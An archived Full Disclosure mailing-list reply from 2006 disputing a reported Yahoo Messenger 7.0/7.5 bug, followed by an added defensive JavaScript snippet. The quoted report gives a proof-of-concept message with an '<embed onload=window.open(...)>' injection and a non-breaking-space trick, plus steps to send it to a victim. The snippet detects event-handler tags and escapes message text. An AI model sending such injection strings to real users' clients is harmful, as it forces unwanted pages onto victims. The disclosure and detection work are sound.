Full Disclosure mailing list archives
Re: Yahoo messenger serious bug
From: "John Dietz" <www.whitewolf () gmail com>
Date: Fri, 28 Jul 2006 11:20:11 -0500
I just tried this in Messenger 7.0 and it never opened a browser window. I copied the text exactly from here and made sure the space after helomsg was [Alt]+0160 and the most I could get it to do was do a Yahoo Search on the string.

Other side sees:

s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(

Yahoo! Search: No results were found for helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg: ---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(.

There must be some other settings on either messenger or the computer itself for this to work as you say. Possibly a setting for messenger to use your default browser for searches instead of the PM window?

Cheers

On 7/28/06, Ivan Ivan <ivancool2003 () yahoo com ar> wrote:
> Hi,
>
> I found another vulnerability in Yahoo messenger: if you receive a private message with this string
>
> "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open ('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
>
> (without quotes), Yahoo messenger opens, in this case, google.com in the Internet Explorer of the remote victim.
>
> Yahoo messenger bug proof of concept:
>
> 1. Open messenger and log in.
> 2. Open a third-party Yahoo chat client like yahelite through the Ymsgr protocol and log in with another account.
> 3. Send a PM to the messenger account with this string:
>
> s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
>
> 4. The remote user will open www.google.com (you can change)
>
> Note: "helomsg :" this space must be created with alt+0160 and this "s: " with a space
>
> s:[space]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open ('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(
>
> Tested in Yahoo messenger 7.0/7.5
>
> Regards.
>
> __________________________________________________
> Ask. Answer. Discover.
> Everything you wanted to know, and what you never imagined, is on Yahoo! Respuestas (Beta).
> Try it now!
> http://www.yahoo.com.ar/respuestas
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
--
There is intelligence in having all the answers, but wisdom lies in knowing which of the questions to answer.
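A defensive example for the kind of string quoted in this thread, added here and not part of either poster's mail: it flags tags carrying event-handler attributes and U+00A0 characters in an inbound message and HTML-escapes the body before display. It assumes the receiving client shows message text in an HTML view, which the thread does not confirm; the function names and the shortened sample message are constructed for illustration.

```javascript
// Added example: triage and safe display of an inbound IM message body.
// Assumption (not confirmed by the thread): the client shows messages in an HTML view.
const NBSP = "\u00A0"; // the character typed with Alt+0160

// Constructed sample, shortened from the shape of the string in the thread.
const SAMPLE = "s: helomsg" + NBSP + ":+)-(msg:-----" +
  "<embed onload=window.open('http://example.invalid/')>";

// Encode every character that can open markup or close an attribute value.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// List what a filter or log reviewer would want flagged in the message.
function inspectMessage(text) {
  const findings = [];
  // Heuristic: any tag carrying an on* event-handler attribute.
  const tagRe = /<\s*([a-z][a-z0-9]*)\b[^>]*?\s(on[a-z]+)\s*=/gi;
  for (const m of text.matchAll(tagRe)) {
    findings.push({ kind: "event-handler", tag: m[1].toLowerCase(),
                    attr: m[2].toLowerCase(), index: m.index });
  }
  // U+00A0 is indistinguishable from a space on screen, so record each one.
  for (let i = text.indexOf(NBSP); i !== -1; i = text.indexOf(NBSP, i + 1)) {
    findings.push({ kind: "nbsp", index: i });
  }
  return findings;
}

// Log form of the message with the non-breaking space made visible.
function forLog(text) {
  return text.split(NBSP).join("[U+00A0]");
}

console.log(inspectMessage(SAMPLE));
console.log(escapeHtml(SAMPLE)); // text that is safe to place in an HTML pane
console.log(forLog(SAMPLE));
```

Escaping at the point of display is the control; the inspection function only supports filtering and log review and will also match harmless attributes that happen to start with "on".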